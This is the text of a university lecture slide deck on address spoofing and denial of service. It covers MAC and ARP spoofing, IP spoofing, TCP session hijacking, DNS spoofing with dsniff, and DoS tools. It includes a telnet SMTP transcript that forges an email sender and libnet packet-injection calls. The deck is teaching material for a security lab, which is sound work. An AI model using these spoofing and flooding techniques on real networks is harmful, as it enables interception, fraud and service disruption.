Upload
bertha-stanley
View
218
Download
0
Tags:
Embed Size (px)
Citation preview
ECE 4112 - Internetwork Security 1
Address Spoofing and Denial of Service
• Agenda Mac Modification Address Resolution Protocol Trickery IP address spoofing TCP session Hijacking Domain Name Spoofing Email Spoofing (not in lab) Denial of Service
ECE 4112 - Internetwork Security 2
IP Spoofing and Denial of Service Lab Exercises
Medium Access Control Address Spoofing
Windows XP MAC modificationLinux MAC modification
IP SpoofingFrom Windows wINJECTFrom Linux fraggle.c
Domain Name System Spoofingdsniff tool
Denial of Servicedatapool tool
synfulteardropudpflood
ECE 4112 - Internetwork Security 3
The Ethernet Frame - IEEE 802.3
•Destination and Source MAC Addresses are modified for spoofing.
ECE 4112 - Internetwork Security 4
MAC modification/Spoofing
• Change the MAC on a Host (Cloning)
Linux (ifconfig) Windows Network Settings
• Creating Link Layer Packets (Spoofing)
libnet (API) Linkcat (tool – netcat for link layer)
ECE 4112 - Internetwork Security 5
Modifying Windows XP Network Interface
ECE 4112 - Internetwork Security 6
Modifying Windows XP Network Interface (continued)
ECE 4112 - Internetwork Security 7
Modifying Linux Network Interface
ECE 4112 - Internetwork Security 8
Address Resolution Protocol (ARP)
• Method to finding a host's Ethernet address• Broadcast message looking for the IP address• Hosts maintain a cache to avoid frequent requests
ECE 4112 - Internetwork Security 9
ARP Cache Poisoning
• Man in the Middle (MiM) Attack Session Stealing Packet/Data Injection
• Beat the Switch Making a Switch into a Hub
ECE 4112 - Internetwork Security 10
Arpspoof Example
ECE 4112 - Internetwork Security 11
Network and Transport Layers
• Internet Protocol (IP)• Internet Control Message Protocol
(ICMP)• Transmission Control Protocol (TCP)• User Data Protocol• TCP Session Hijacking
ECE 4112 - Internetwork Security 12
Internet Protocol (IP)
• IP provides a best-effort way to route datagrams from source to destination
• Source address, destination address: network number and host number
• IP spoofing: change or disguise source address
version IHL Type of Service Total length
Identification DF DF MF Fragment offset
Time to live Protocol Header checksum
Source address
Destination address
Options (0 or more words)
ECE 4112 - Internetwork Security 13
IP Spoofing
• Non-blind attacks Attacker and target on same subnet Reply traffic can be sniffed
• Blind attacks Attacker and target on different subnets Reply traffic cannot be seen by attacker Attacker must be able to predict replies
ECE 4112 - Internetwork Security 14
IP Spoofing
• Attacks made possible by IP spoofing include Denial of Service (DOS) Session Hijacking Man in the Middle
• To take over a TCP stream, sequence and acknowledgement numbers must be sniffed or predicted.
ECE 4112 - Internetwork Security 15
Transmission Control Protocol (TCP)
• Source and Destination Ports• Sequence and Acknowledgement number• Reliability Checksum (not tamperproof)
Source port Destination port
Sequence number
Acknowledgement number
TCP HLURG
ACK
PSH
RST
SYN
FIN
Window size
Checksum Urgent pointer
Options (0 or more 32-bit words)
Data (Optional)
ECE 4112 - Internetwork Security 16
Transmission Control Protocol (TCP)
• Packet Types URG - Urgent ACK - Acknowledge PSH - Push RST - Reset SYN - Synchronize can flood a server FIN - Finish
ECE 4112 - Internetwork Security 17
Transmission Control Protocol (TCP) (4)
• TCP connection initiation Three-way handshake
SYN (SEQ=x)
SYN (SEQ=y, ACK=x+1)
(SEQ=x+1, ACK=y+1)
Host 1 Host 2
ECE 4112 - Internetwork Security 18
Session Hijacking
• Session hijacking attacks: based on sniffing and IP spoofing Attacker monitors packets between Alice and
Bob Attacker injects spoofed traffic with a source IP
address of AliceAlice Bob
Attacker
network
Alice telnet
“Hi, I am Alice”
ECE 4112 - Internetwork Security 19
DNS Spoofing
• Causes name resolution to result in an incorrect IP address
• In our lab, use tool dsniff to accomplish
ECE 4112 - Internetwork Security 20
DSniff
• Collection of tools for network auditing and penetration testing.
• Tools included ArpSpoof DNSspoof Dsniff Filesnarf Macof
ECE 4112 - Internetwork Security 21
DSniff
Mailsnarf Msgsnarf TCPKill TCPnice URLSnarf WebSpy SSHMITM WebMITM
ECE 4112 - Internetwork Security 22
DSniff
• All kinds of attacks can be run. E.g. – Password Sniffing Message and File Capture URL Capture Man-In-The-Middle
• Lab exercises DNS Spoofing
ECE 4112 - Internetwork Security 23
Email Spoofing
• Email spoofing is effective because most people don’t have time to double check their headers all the time.
• An email’s true origin can be further obfuscated by forging extra “Received:” lines.
• To force a verification, email can be cryptographically signed.
ECE 4112 - Internetwork Security 24
Email Spoofing
• Email spoofing is a form of social engineering.
• Email spoofing is also used by spammers to make it more difficult to track them.
• A forged email can be detected by close inspection of its headers.
• Login to SMTP (port 25) is unauthenticated, so anyone can log in and send mail.
ECE 4112 - Internetwork Security 25
Email Spoofing (Not in Lab Assignment)
telnet mail.xyz.gatech.edu 25220 sark.xyz.gatech.edu ESMTP Sendmail 8.12.10/8.12.8; Mon, 1 Dec 2003 040500 (EST)HELO abc4883.com250 sark.xyz.gatech.edu Hello ece-237-37.abc.gatech.edu [130.207.237.37], pleased to meet youMAIL FROM: <[email protected]>250 2.1.0 <[email protected]>... Sender okRCPT TO: <[email protected]>250 2.1.5 <[email protected]>... Recipient okDATA354 Enter mail, end with "." on a line by itselfGreetings from abc4883!.250 2.0.0 hAUMOh6c005386 Message accepted for deliveryQUIT221 2.0.0 sark.xyz.gatech.edu closing connection
ECE 4112 - Internetwork Security 26
Raw Sockets
• Allows the application to directly access the Network Access Layer (TCP/IP model)
• Develop new or build upon existing protocols• Programming difference:
socket( sockfd, SOCK_RAW, IPPROTO_TCP);
Manually build the necessary headers
• Requires super user access• Not implemented the same across all
platforms
ECE 4112 - Internetwork Security 27
libnet
• Raw Sockets and Link Layer facilities• Simplifies packet injection programming
libnet_build_ipv4( packet_length, type_of_service, identity, fragment, time-to-live, protocol, checksum, source_port, destination_port, payload, payload_size, libnet, ptag)
libnet_autobuild_ipv4( packet_length, protocol, destination_port, libnet);
• Allows for prebuilding streams of packets• Efficient mechanism for packet injection• Portable solution for packet injection
ECE 4112 - Internetwork Security 28
Denial of Service
• Denial of Service Easy to mount – script kiddies Requires few computing resources Most common attack – deadly results
• Comes in various forms. E.g. – Buffer Overflow Attack Teardrop Attack Syn Flood Smurf Attack
ECE 4112 - Internetwork Security 29
Internet Control Message Protocol (ICMP)
• ICMP is used to test the Internet.• Each ICMP message type is encapsulated in an IP
packet.
Message type Description
Destination unreachable Packet could not be delivered
Time exceeded Time to live field hit 0
Parameter problem Invalid header field
Redirect Teach a router about geography
Echo request Ask a machine if it is alive
Echo reply Yes, I am alive
ECE 4112 - Internetwork Security 30
Denial of Service
• Buffer Overflow Send more data than allotted buffer space.
E.g. – More than 256 chars in email from field.
• Tear Drop Takes advantage of IP Fragmentation.
• Syn Flood Flood target with connection requests.
• Smurf ICMP echo requests with spoofed IP.
ECE 4112 - Internetwork Security 31
Denial of Service
• Tool to be used in lab – Datapool• Customizable script with capabilities
to run 106 different DoS attacks (including ones discussed)!
• Can run attacks against multiple IPs and learns about vulnerabilities of each.
• IPSpoofing used to disguise source of attack.
ECE 4112 - Internetwork Security 32
References WWW
• OSI Model: RAD Data Communications
• libnet (packetfactory.net)• Raw Socket Programming (mixter.void.
ru)• Paketto (www.doxpara.com/paketto)• Dsniff (naughty.monkey.org/~dugsong/dsniff)
ECE 4112 - Internetwork Security 33
References Books
• Computer Networks Third Edition, Andrew Tanenbaum, Prentice-Hall1996.
• Counter Hack. Ed Skoudis, Prentice-Hall 2002.
• TCP/IP Illustrated, Volume 1. W. Richard Stevens, Addison-Wesley1994.